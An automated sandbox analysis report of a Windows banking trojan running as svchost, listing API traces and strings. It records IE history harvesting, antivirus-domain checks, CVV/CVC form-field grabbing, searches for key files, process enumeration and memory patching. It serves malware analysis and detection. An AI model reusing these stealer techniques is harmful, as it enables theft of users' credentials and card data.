Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
String ID: .txt$.zip$5E8DC03F$asus$found.$keys$path
API String ID: 2233314381-4152965783
Opcode ID: a95d4c8463610239b0dce4ad51964a37958845e731baef9aabfd70e352cd120d
Instruction ID: e14125a5325580057a474fd32a2a2e3172fb458efdbeb8630e5dec49226f5326
Opcode Fuzzy Hash: a95d4c8463610239b0dce4ad51964a37958845e731baef9aabfd70e352cd120d
Instruction Fuzzy Hash: 3191E4315083468FCB16CF34E468AABBBE5AF89345F188958E8C6D7340EB31DD49C7A1

Function 02D246C0 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 178fileregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02D246E5
_snprintf.MSVCRT ref: 02D2470D
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02D24747
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24769
LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24775
WriteFile.KERNEL32(00000000,IE history:,0000000C,02D256A1,00000000), ref: 02D24789
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24797
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D247AB
LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247B7
WriteFile.KERNEL32(00000000,02D65B10,00000001,00000000,00000000), ref: 02D247CB
UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247D9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24803
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D2480F
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D24824
UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D24834
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24848
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24854
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D24868
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D24876
_snprintf.MSVCRT ref: 02D24895
RegCloseKey.ADVAPI32(?), ref: 02D248AC

Strings

IE history:, xrefs: 02D24783
Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 02D246D4
url%i, xrefs: 02D246F5, 02D24881

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
API String ID: 757183407-427538202
Opcode ID: 10f4d5754d3c0ec9e1e0ba065cbc1b007659ac05c1ced394729626424c623b86
Instruction ID: 3c2bb73f7e5091a752a32e50d297708623e3a0a2f49ab89881c548a1a85a844b
Opcode Fuzzy Hash: 10f4d5754d3c0ec9e1e0ba065cbc1b007659ac05c1ced394729626424c623b86
Instruction Fuzzy Hash: E0512C71A91315BBF7208B90AC8EFEE7778AB49B05F504444F701AA2C0D7F06E948BB5

Function 02D35020 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169memorysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02D34330: IsUserAnAdmin.SHELL32 ref: 02D3433A
Part of subcall function 02D34330: memset.MSVCRT ref: 02D34370
Part of subcall function 02D34330: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02D34397
Part of subcall function 02D34330: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02D343BA
Part of subcall function 02D34330: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02D3442D
Part of subcall function 02D34330: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D34434
Part of subcall function 02D34330: memset.MSVCRT ref: 02D34444

GetTickCount.KERNEL32 ref: 02D3503F
_snprintf.MSVCRT ref: 02D35054

Part of subcall function 02D34AF0: IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
Part of subcall function 02D34AF0: IsUserAnAdmin.SHELL32 ref: 02D34B11
Part of subcall function 02D34AF0: DnsFlushResolverCache.DNSAPI ref: 02D34B1B
Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B38
Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B9C
Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5

Sleep.KERNEL32(000001F4), ref: 02D35075
GetTempPathA.KERNEL32(00000104,?), ref: 02D3508C
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D350A4
GetProcessHeap.KERNEL32(00000000,?,00000000,00000001,00000000,?,?,Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000001,?,?,00000001,00000000), ref: 02D3512C
HeapValidate.KERNEL32(00000000), ref: 02D3512F
GetProcessHeap.KERNEL32(00000000,?), ref: 02D3513C
HeapFree.KERNEL32(00000000), ref: 02D3513F
RtlImageNtHeader.NTDLL(00000000), ref: 02D35165

Strings

id=1&post=%u, xrefs: 02D35046
C:\Windows\apppatch\svchost.exe, xrefs: 02D35173, 02D3519B, 02D351B0, 02D351BB, 02D351D1
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D350CB, 02D350E0, 02D35108
A1633F27a, xrefs: 02D35029
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D350C2

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTickValidateValue_snprintf
String ID: A1633F27a$C:\Windows\apppatch\svchost.exe$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$id=1&post=%u
API String ID: 2364452126-1117616434
Opcode ID: b9d8af1d4a9e1f12a50ada2ec39429a23b44ab9565feff73844357e272f200b6
Instruction ID: ea93b0697295e4a08669867db19145bb48732cd28e24a887d6f0900e20f8859c
Opcode Fuzzy Hash: b9d8af1d4a9e1f12a50ada2ec39429a23b44ab9565feff73844357e272f200b6
Instruction Fuzzy Hash: 4B519371A80305BBEB219BA4FC4EFEA3769EB48744F944454F60597380EBB4DD448BB1

Function 02D25EB0 Relevance: 39.1, APIs: 13, Strings: 13, Instructions: 76COMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI(?,avast.com,?,?,02D2604F), ref: 02D25ECB
StrStrIW.SHLWAPI(?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25EDB
StrStrIW.SHLWAPI(?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25EEB
StrStrIW.SHLWAPI(?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25EF7
StrStrIW.SHLWAPI(?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25F03
StrStrIW.SHLWAPI(?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25F0F
StrStrIW.SHLWAPI(?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?), ref: 02D25F1B
StrStrIW.SHLWAPI(?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com), ref: 02D25F27
StrStrIW.SHLWAPI(?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky), ref: 02D25F33
StrStrIW.SHLWAPI(?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb), ref: 02D25F3F
StrStrIW.SHLWAPI(?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com), ref: 02D25F4B
StrStrIW.SHLWAPI(?,anti-malware,?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir), ref: 02D25F57
StrStrIW.SHLWAPI(?,.comodo.com,?,anti-malware,?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira), ref: 02D25F63

Strings

drweb, xrefs: 02D25EE5
virusinfo, xrefs: 02D25F21
avast.com, xrefs: 02D25EC5
kaspersky, xrefs: 02D25ED5
.comodo.com, xrefs: 02D25F5D
antivir, xrefs: 02D25EFD
virustotal, xrefs: 02D25F15
anti-malware, xrefs: 02D25F51
z-oleg.com, xrefs: 02D25F2D
kltest.org.ru, xrefs: 02D25F39
eset.com, xrefs: 02D25EF1
trendsecure, xrefs: 02D25F45
avira, xrefs: 02D25F09

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$kltest.org.ru$trendsecure$virusinfo$virustotal$z-oleg.com
API String ID: 0-3008981035
Opcode ID: 8abbebf26cf268469bd33470e59e14e2d65aee8190b687f32ef581c0b5170c4f
Instruction ID: 7d05a577b3efcb31d967a9912be885e6abe19d9dc09216d81f604d27b88fce4c
Opcode Fuzzy Hash: 8abbebf26cf268469bd33470e59e14e2d65aee8190b687f32ef581c0b5170c4f
Instruction Fuzzy Hash: C0116E52386B37327A1571697C59F6F424C8D61CCE3C90620F861F1385E785CD4F4AB9

Function 00402EA0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 436commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,?), ref: 00402EB0
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402ED0
CoCreateInstance.OLE32(004043E8,00000000,00000001,004041D8,?), ref: 00402EF7
VariantInit.OLEAUT32(?), ref: 00402F0F
VariantInit.OLEAUT32(?), ref: 00402F2A
VariantInit.OLEAUT32(?), ref: 00402F48
VariantInit.OLEAUT32(?), ref: 00402F66
VariantClear.OLEAUT32(?), ref: 00402FEC
VariantClear.OLEAUT32(?), ref: 00402FF2
VariantClear.OLEAUT32(?), ref: 00402FF8
VariantClear.OLEAUT32(?), ref: 00402FFE
InterlockedDecrement.KERNEL32(.5@), ref: 0040303D
SysAllocString.OLEAUT32(00404F3C), ref: 004031E6
VariantInit.OLEAUT32(?), ref: 0040320B
VariantInit.OLEAUT32(?), ref: 00403229

Part of subcall function 00402DC0: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00403011,00404F28), ref: 00402DC8
Part of subcall function 00402DC0: HeapAlloc.KERNEL32(00000000,?,00403011,00404F28), ref: 00402DCF
Part of subcall function 00402DC0: SysAllocString.OLEAUT32(00403011), ref: 00402DF0

VariantClear.OLEAUT32(?), ref: 004032D6
VariantClear.OLEAUT32(?), ref: 004032DC
VariantClear.OLEAUT32(?), ref: 004032E2

Strings

.5@, xrefs: 0040306D, 00403237, 00403070, 00403240
p=<u, xrefs: 00402F05, 004031F2
.5@, xrefs: 00403009, 00403030, 00403071, 00403095, 00403146, 00403166, 004031AA, 004031CA, 00403241, 004032C8, 0040303C
cmd.exe, xrefs: 00403141

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
String ID: .5@$.5@$cmd.exe$p=<u
API String ID: 2839743307-1930425439
Opcode ID: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction ID: 7356d6b497d974f43c465eb486c8ab872bac2c341a44699d5e6db9722a73acc6
Opcode Fuzzy Hash: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction Fuzzy Hash: 65F1EA75E102199FCB00DFA8C884A9EBBB9FF88710F15816AE914BB391D774AD41CF94

Function 02D39E50 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 02D39E76
GetThreadPriority.KERNEL32(00000000,?,02D3A160,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D39E7D
GetTickCount.KERNEL32 ref: 02D39E86
VirtualProtect.KERNEL32(02D3A160,00000008,00000040,?,?,02D3A160,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000), ref: 02D39EA7
VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02D39EC6
VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02D39EE2
InterlockedExchange.KERNEL32(00000000,00000004), ref: 02D39EF8
InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02D39F06
InterlockedExchange.KERNEL32(00000005,00000000), ref: 02D39F11
InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02D39F24
InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02D39F35
InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02D39F44
InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02D39F53
InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02D39F62
InterlockedExchange.KERNEL32(00000006,?), ref: 02D39F6A
InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02D39F7D
InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02D39F8E
InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02D39F9D
InterlockedExchange.KERNEL32(00000005,00000000), ref: 02D39FA9
VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02D39FB3
GetCurrentThread.KERNEL32 ref: 02D39FBB
SetThreadPriority.KERNEL32(00000000), ref: 02D39FC2
GetCurrentThread.KERNEL32 ref: 02D39FFE
SetThreadPriority.KERNEL32(00000000), ref: 02D3A005
VirtualProtect.KERNEL32(02D3A160,00000008,00000000,02D3A160), ref: 02D3A01F

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
String ID:
API String ID: 2984368831-0
Opcode ID: 1015ab2619526b394a713de296e82c23d0f0a9ea9962f3fa32112651f0e283b3
Instruction ID: bd680d3785d96763ba1e66baa25dbcf16c78b3f0fc1d6c6e6de3d80c9610c12a
Opcode Fuzzy Hash: 1015ab2619526b394a713de296e82c23d0f0a9ea9962f3fa32112651f0e283b3
Instruction Fuzzy Hash: B5516171940219EFD710AF74DC49BAE77ACFF49310F158928F986E7280DA789D91CBA0

Function 02D3FA20 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 174memoryfileCOMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI(02D2135E,\java\,?,75B05180,00000000,?,?,02D2135E,?,?), ref: 02D3FA5D
StrStrIW.SHLWAPI(02D2135E,\windows\,?,?,02D2135E,?,?), ref: 02D3FA6D
WideCharToMultiByte.KERNEL32(00000000,00000000,02D2135E,000000FF,00000000,00000000,00000000,00000000,?,?,02D2135E,?,?), ref: 02D3FA82
GetProcessHeap.KERNEL32(00000008,00000013,?,?,02D2135E,?,?), ref: 02D3FA9E
HeapAlloc.KERNEL32(00000000,?,?,02D2135E,?,?), ref: 02D3FAA5
memset.MSVCRT ref: 02D3FAB5
WideCharToMultiByte.KERNEL32(00000000,00000000,02D2135E,000000FF,00000000,00000000,00000000,00000000,?,?,02D2135E,?,?), ref: 02D3FAD1
GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02D3FAEA
GetFileSizeEx.KERNEL32(?,?,?,?,02D2135E,?,?), ref: 02D3FB0B
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,02D2135E,?,?), ref: 02D3FB32
LockFile.KERNEL32(?,00000000,00000000,00000004,00000000,?,?,02D2135E,?,?), ref: 02D3FB42
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,02D2135E,?,?), ref: 02D3FB57
UnlockFile.KERNEL32(?,00000000,00000000,00000004,00000000,?,?,02D2135E,?,?), ref: 02D3FB67
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,75B05180,00000000,?,?,02D2135E,?,?), ref: 02D3FBC3
GetProcessHeap.KERNEL32(00000000,?,?,?,02D2135E,?,?), ref: 02D3FBDA
HeapValidate.KERNEL32(00000000,?,?,02D2135E,?,?), ref: 02D3FBDD
GetProcessHeap.KERNEL32(00000000,?,?,?,02D2135E,?,?), ref: 02D3FBEE
HeapFree.KERNEL32(00000000,?,?,02D2135E,?,?), ref: 02D3FBF1

Strings

\windows\, xrefs: 02D3FA67
\java\, xrefs: 02D3FA57
iBKS, xrefs: 02D3FB77

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$ByteCharMultiPointerWide$AllocFreeLockNamePathReadShortSizeUnlockValidatememset
String ID: \java\$\windows\$iBKS
API String ID: 3399125490-2513530025
Opcode ID: 993a20b09fa555927472c35180be4ffd2e1dfb1658ac2ac8201af103afd598be
Instruction ID: ab50cc08faca15b1015cb276bf2fd939298d905ce5791b0b8291dfa4ae3acb2e
Opcode Fuzzy Hash: 993a20b09fa555927472c35180be4ffd2e1dfb1658ac2ac8201af103afd598be
Instruction Fuzzy Hash: CB51ACB2A45315AFE7218B26DC58FAB7BACEF44B64F544918F944DA380D7B0DC40CAB1

Function 02D3DEF0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145memorystringthreadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000,&cvv=,00000000,74DEF380,00000000,00000001,00000000,?,?,?,02D384F4,?,?,?,?,?), ref: 02D3DF33
StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF41
StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF4D
StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF5B
StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF67
StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF79
strstr.MSVCRT ref: 02D3DF8F
strstr.MSVCRT ref: 02D3DFA2
GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02D3E00B
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02D3E012
memset.MSVCRT ref: 02D3E022
CreateThread.KERNEL32(00000000,00000000,02D3E080,00000000,00000000,00000000), ref: 02D3E048
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3E060
CloseHandle.KERNEL32(00000000), ref: 02D3E071

Strings

&cvv=&, xrefs: 02D3DF3B
&cvv2=&, xrefs: 02D3DF55
&domain=letitbit.net&, xrefs: 02D3DF89
&cvv2=, xrefs: 02D3DF47
&cvc=&, xrefs: 02D3DF73
&cvc=, xrefs: 02D3DF61
&cvv=, xrefs: 02D3DF28

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
API String ID: 1632825432-2817208116
Opcode ID: 588ab4a2bf43488833a334e4a94df61e7dc74a57a66fc9ca581661ac57fe6e67
Instruction ID: 37d4f6b77888ce9da177eb437f61be919d5acbd103bc630710d2d6e70a5c5a2d
Opcode Fuzzy Hash: 588ab4a2bf43488833a334e4a94df61e7dc74a57a66fc9ca581661ac57fe6e67
Instruction Fuzzy Hash: 5641F4316857612BE3230638EC5DFBA279A8F46B85F7C4250EC80E7381DB75DE09C6A4

Function 02D21000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 155memorythreadCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02D2148C,00000000,?), ref: 02D2101B
GetProcessHeap.KERNEL32(00000008,00000013,74DEF570,?,02D2148C,00000000,?), ref: 02D2103E
HeapAlloc.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D21045
memset.MSVCRT ref: 02D21055
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,74DEF570,?,02D2148C,00000000,?), ref: 02D21073
StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02D2148C,00000000,?), ref: 02D21093
CreateThread.KERNEL32(00000000,00000000,02D40320,00000000,00000000,00000000), ref: 02D210B9
StrStrIA.SHLWAPI(00000000,\secrets.key,?,02D2148C,00000000,?), ref: 02D210D5
CreateThread.KERNEL32(00000000,00000000,02D41CE0,00000000,00000000,00000000), ref: 02D210E5
StrStrIA.SHLWAPI(00000000,sign.key,?,02D2148C,00000000,?), ref: 02D210FD
CreateThread.KERNEL32(00000000,00000000,02D427C0,00000000,00000000,00000000), ref: 02D21116
GetHandleInformation.KERNEL32(00000000,?,?,02D2148C,00000000,?), ref: 02D2112A
CloseHandle.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D2113B
GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D21150
HeapValidate.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D21153
GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D2115F
HeapFree.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D21162

Strings

name.key, xrefs: 02D2108D
\secrets.key, xrefs: 02D210CF
sign.key, xrefs: 02D210F7

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
String ID: \secrets.key$name.key$sign.key
API String ID: 3254303593-2345338882
Opcode ID: c1c363e535b3cb3e7c4fe3c3e5e1bf0084408fbebec15073ec4f0ae694e5b09d
Instruction ID: fe7dccb6c2f2b2e56a2683bdd149eb456201774b625ce24da795cc30a38ed53d
Opcode Fuzzy Hash: c1c363e535b3cb3e7c4fe3c3e5e1bf0084408fbebec15073ec4f0ae694e5b09d
Instruction Fuzzy Hash: 9C41E4315402B17B97325A66AC8CEAF3B6CDED7F68B148518F919A2341DB31CD49CAB0

Function 02D24290 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 194memoryprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D242C3
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D242CE
Process32First.KERNEL32 ref: 02D242F1
GetHandleInformation.KERNEL32(00000000,?), ref: 02D2430D
CloseHandle.KERNEL32(00000000), ref: 02D24327
GetProcessHeap.KERNEL32(00000008,?), ref: 02D24360
HeapAlloc.KERNEL32(00000000), ref: 02D24367
memset.MSVCRT ref: 02D2437B
OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02D243AC
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02D243C3
_snprintf.MSVCRT ref: 02D2442C
Process32Next.KERNEL32(?,?), ref: 02D2443B

Strings

%d%s, xrefs: 02D24423
taskmgr{PIDProcess name, xrefs: 02D242A4
[System Process], xrefs: 02D243DB

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
String ID: %d%s$[System Process]$taskmgr{PIDProcess name
API String ID: 3808533164-4214784430
Opcode ID: 2dd96ee65653f91e8bf5a69026c2ffa2e83e693d7296ae4c1d4c7d9f28e99617
Instruction ID: 3d40491ec747cf1332670ac0987185983517ab13c60569ba8c642991974c34ca
Opcode Fuzzy Hash: 2dd96ee65653f91e8bf5a69026c2ffa2e83e693d7296ae4c1d4c7d9f28e99617
Instruction Fuzzy Hash: 10612571904351AFC710CF64E898AABBBE9EF95358F448968F88587340E771DC0DCBA1

Function 02D40B80 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5E8DC3C1,?,75BFBF00), ref: 02D40BB0
CreateDirectoryA.KERNEL32(?,00000000,?,75BFBF00), ref: 02D40BF1
